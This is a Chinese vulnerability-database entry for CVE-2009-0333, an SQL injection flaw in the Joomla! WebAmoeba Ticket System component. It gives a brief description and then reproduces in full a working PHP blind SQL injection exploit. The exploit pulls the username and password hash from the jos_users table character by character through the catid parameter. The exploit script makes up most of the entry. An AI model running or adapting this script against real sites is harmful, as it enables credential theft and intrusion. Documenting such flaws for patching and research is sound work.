https://www.exploit-db.com/exploits/7833
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-429
Joomla! 组件WebAmoeba (WA) Ticket System SQL注入漏洞
| 漏洞ID | 1117261 | 漏洞类型 | SQL注入 |
| 发布时间 | 2009-01-19 | 更新时间 | 2009-01-29 |
 CVE编号
|
CVE-2009-0333 |  CNNVD-ID
|
CNNVD-200901-429 |
| 漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
Joomla!是一款开放源码的内容管理系统(CMS)。Joomla!WebAmoeba(WA)TicketSystem(com_waticketsystem)组件中存在SQL注入漏洞。远程攻击者可以借助对index.php的类别操作中的catid参数,执行任意的SQL指令。
|漏洞EXP
<?php
ini_set("max_execution_time",0);
print_r('
##############################################################################
#
# Joomla com_waticketsystem Blind SQL Injection Exploit
#
# === Cyb3R-1st ===
# cyb3r-1st@hormail.com
# == inject0r5 t3am ==
#
# usegae : php file.php "http://site/index.php?option=com_waticketsystem&act=category&catid=1"
#
##############################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>
# milw0rm.com [2009-01-19]|参考资料
来源:BID
名称:33353
链接:http://www.securityfocus.com/bid/33353
来源:SECUNIA
名称:33577
链接:http://secunia.com/advisories/33577
来源:MILW0RM
名称:7833
链接:http://milw0rm.com/exploits/7833
检索漏洞
开始时间
结束时间